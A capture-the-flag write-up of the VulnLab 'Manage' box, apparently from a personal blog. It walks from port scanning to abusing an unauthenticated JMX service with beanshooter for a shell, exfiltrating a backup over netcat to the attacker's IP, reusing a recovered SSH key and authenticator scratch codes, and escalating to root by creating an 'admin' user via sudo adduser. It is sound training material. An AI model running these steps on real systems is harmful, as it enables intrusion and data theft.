Post

VulnLab Manage

VulnLab Manage

VulnLab Manage

Manage

Recon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
└─$ rustscan -a 10.10.82.208 -r 1-65535                                                            
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TCP handshake? More like a friendly high-five!

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 10.10.82.208:22
Open 10.10.82.208:2222
Open 10.10.82.208:8080
Open 10.10.82.208:42073
Open 10.10.82.208:39741
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-14 21:15 +05
Initiating Ping Scan at 21:15
Scanning 10.10.82.208 [4 ports]
Completed Ping Scan at 21:15, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:15
Completed Parallel DNS resolution of 1 host. at 21:15, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:15
Scanning 10.10.82.208 [5 ports]
Discovered open port 8080/tcp on 10.10.82.208
Discovered open port 22/tcp on 10.10.82.208
Discovered open port 42073/tcp on 10.10.82.208
Discovered open port 39741/tcp on 10.10.82.208
Discovered open port 2222/tcp on 10.10.82.208
Completed SYN Stealth Scan at 21:15, 0.11s elapsed (5 total ports)
Nmap scan report for 10.10.82.208
Host is up, received reset ttl 63 (0.090s latency).
Scanned at 2024-12-14 21:15:30 +05 for 0s

PORT      STATE SERVICE      REASON
22/tcp    open  ssh          syn-ack ttl 63
2222/tcp  open  EtherNetIP-1 syn-ack ttl 63
8080/tcp  open  http-proxy   syn-ack ttl 63
39741/tcp open  unknown      syn-ack ttl 63
42073/tcp open  unknown      syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
           Raw packets sent: 9 (372B) | Rcvd: 6 (260B)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─$ nmap -sC -sV -p22,2222,8080,39741,42073 10.10.82.208 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-14 21:16 +05
Nmap scan report for 10.10.82.208
Host is up (0.096s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a9:36:3d:1d:43:62:bd:b3:88:5e:37:b1:fa:bb:87:64 (ECDSA)
|_  256 da:3b:11:08:81:43:2f:4c:25:42:ae:9b:7f:8c:57:98 (ED25519)
2222/tcp  open  java-rmi   Java RMI
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
| rmi-dumpregistry: 
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @127.0.1.1:42073
|     extends
|       java.rmi.server.RemoteStub
|       extends
|_        java.rmi.server.RemoteObject
8080/tcp  open  http       Apache Tomcat 10.1.19
|_http-title: Apache Tomcat/10.1.19
|_http-favicon: Apache Tomcat
39741/tcp open  tcpwrapped
42073/tcp open  java-rmi   Java RMI
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.48 seconds

We find Apache Tomcat 10.1.19 running on port 8080, yet nothing interesting

User

The most interesting port is 2222, which seems to be running Java RMI. Material to read to understand RMI and JMX:

To enumerate the port, we will use beanshooter

1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar -h   
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
usage: beanshooter [-h]   ...

beanshooter v4.1.0 - a JMX enumeration and attacking tool

positional arguments:
                          
    attr                 set or get MBean attributes
    brute                bruteforce JMX credentials
    deploy               deploys the specified MBean on the JMX server
    enum                 enumerate the JMX service for common vulnerabilities
<SNIP>

Let’s enumerate

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum 10.10.82.208 2222   
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Checking available bound names:
[+]
[+]     * jmxrmi (JMX endpoint: 127.0.1.1:42073)
[+]
[+] Checking for unauthorized access:
[+]
[+]     - Remote MBean server does not require authentication.
[+]       Vulnerability Status: Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+]     - Remote MBeanServer rejected the payload class.
[+]       Vulnerability Status: Non Vulnerable
[+]
[+] Checking available MBeans:
[+]
[+]     - 171 MBeans are currently registred on the MBean server.
[+]       Listing 149 non default MBeans:
<SNIP>
[+]
[+] Enumerating tomcat users:
[+]
[+]     - Listing 2 tomcat users:
[+]
[+]             ----------------------------------------
[+]             Username:  manager
[+]             Password:  <REDACTED>
[+]             Roles:
[+]                        Users:type=Role,rolename="manage-gui",database=UserDatabase
[+]
[+]             ----------------------------------------
[+]             Username:  admin
[+]             Password:  <REDACTED>
[+]             Roles:
[+]                        Users:type=Role,rolename="role1",database=UserDatabase

We were able to retrieve admin and manager credentials. We can try invoking shell using the same tool

1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard 10.10.82.208 2222 tonka
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Creating a TemplateImpl payload object to abuse StandardMBean
[+]
[+]     Deplyoing MBean: StandardMBean
[+]     MBean with object name de.qtc.beanshooter:standard=22016402736778 was successfully deployed.
[+]
[+]     Caught NullPointerException while invoking the newTransformer action.
[+]     This is expected bahavior and the attack most likely worked :)
[+]
[+]     Removing MBean with ObjectName de.qtc.beanshooter:standard=22016402736778 from the MBeanServer.
[+]     MBean was successfully removed.

1
2
3
4
5
└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell 10.10.82.208 2222      
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[tomcat@10.10.82.208 /]$ whoami
tomcat
[tomcat@10.10.82.208 /]$ 

Now we need to move laterally. There 2 users in home directory, useradmin and karl. We tried using passwords we found during enumeration of JMX on karl, but no success. Yet, trying admin password on useradmin showed Verification Code message

1
2
3
4
tomcat@manage:/$ su useradmin
su useradmin
Password: <SNIP>
Verification code: 

We find .google_authenticator (can’t read) and backups folder

1
2
3
4
5
6
7
8
9
10
11
12
13
tomcat@manage:/home/useradmin$ ls -lha
ls -lha
total 36K
drwxr-xr-x 5 useradmin useradmin 4.0K Dec 14 17:06 .
drwxr-xr-x 4 root      root      4.0K Jun 21 15:46 ..
drwxrwxr-x 2 useradmin useradmin 4.0K Jun 21 16:51 backups
lrwxrwxrwx 1 useradmin useradmin    9 Jun 21 15:48 .bash_history -> /dev/null
-rw-r--r-- 1 useradmin useradmin  220 Jun 21 15:46 .bash_logout
-rw-r--r-- 1 useradmin useradmin 3.7K Jun 21 15:46 .bashrc
drwx------ 2 useradmin useradmin 4.0K Jun 21 16:48 .cache
-r-------- 1 useradmin useradmin  200 Dec 14 17:06 .google_authenticator
-rw-r--r-- 1 useradmin useradmin  807 Jun 21 15:46 .profile
drwxrwxr-x 2 useradmin useradmin 4.0K Jun 21 15:53 .ssh

Inside backups we find archive, let’s transfer it

1
2
3
4
5
6
7
8
tomcat@manage:/home/useradmin/backups$ ls -lha
ls -lha
total 12K
drwxrwxr-x 2 useradmin useradmin 4.0K Jun 21 16:51 .
drwxr-xr-x 5 useradmin useradmin 4.0K Dec 14 17:06 ..
-rw-rw-r-- 1 useradmin useradmin 3.1K Jun 21 16:50 backup.tar.gz
tomcat@manage:/home/useradmin/backups$ nc 10.8.4.147 6666 < backup.tar.gz
nc 10.8.4.147 6666 < backup.tar.gz

Inside we find .google_authentificator and .ssh with ssh keys

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ cat .google_authenticator                                                                                                     
CLSSSMHYGLENX5HAIFBQ6L35UM
" RATE_LIMIT 3 30 1718988529
" WINDOW_SIZE 3
" DISALLOW_REUSE 57299617
" TOTP_AUTH
99852083
20312647
73235136
92971994
86175591
98991823
54032641
69267218
76839253
56800775

1
2
3
4
5
6
7
└─$ ls -lha .ssh    
total 20K
drwxrwxr-x 2 kali kali 4.0K Jun 21 20:53 .
drwxr-xr-x 5 kali kali 4.0K Jun 21 21:48 ..
-rw------- 1 kali kali   98 Jun 21 20:56 authorized_keys
-rw------- 1 kali kali  411 Jun 21 20:53 id_ed25519
-rw-r--r-- 1 kali kali   98 Jun 21 20:53 id_ed25519.pub

When we try using the key to connect via ssh, it prompts for verification code, thus entering one from the .google_authenticator gives us access

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
└─$ ssh -i .ssh/id_ed25519 useradmin@10.10.82.208
The authenticity of host '10.10.82.208 (10.10.82.208)' can't be established.
ED25519 key fingerprint is SHA256:mTJofQVp4T/1uO1CFsfPt8SADZfjbzIIynR0Zeqi0qo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.82.208' (ED25519) to the list of known hosts.
(useradmin@10.10.82.208) Verification code: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat Dec 14 05:15:31 PM UTC 2024

  System load:  0.0               Processes:             110
  Usage of /:   74.8% of 6.06GB   Users logged in:       0
  Memory usage: 41%               IPv4 address for ens5: 10.10.82.208
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Jun 21 16:48:53 2024 from 192.168.94.139
useradmin@manage:~$ 

Root

useradmin has sudo rights for adduser. But there’s regex for alphanumeric characters, so entering --system,--ingroup won’t work.

1
2
3
4
5
6
7
useradmin@manage:~$ sudo -l
Matching Defaults entries for useradmin on manage:
    env_reset, timestamp_timeout=1440, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User useradmin may run the following commands on manage:
    (ALL : ALL) NOPASSWD: /usr/sbin/adduser ^[a-zA-Z0-9]+$

According to hint for root, we have to check the default ubuntu sudoers file

1
2
3
4
<SNIP>
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
<SNIP>

There’s no admin user, so we can add one and get root privileges and pwn the box

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
useradmin@manage:~$ sudo /usr/sbin/adduser admin
Adding user `admin' ...
Adding new group `admin' (1003) ...
Adding new user `admin' (1003) with group `admin' ...
Creating home directory `/home/admin' ...
Copying files from `/etc/skel' ...
New password: 
Retype new password: 
passwd: password updated successfully
Changing the user information for admin
Enter the new value, or press ENTER for the default
        Full Name []: 
        Room Number []: 
        Work Phone []: 
        Home Phone []: 
        Other []: 
Is the information correct? [Y/n] y
useradmin@manage:~$ su admin
Password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@manage:/home/useradmin$ sudo su
[sudo] password for admin: 
root@manage:/home/useradmin# 

This post is licensed under CC BY 4.0 by the author.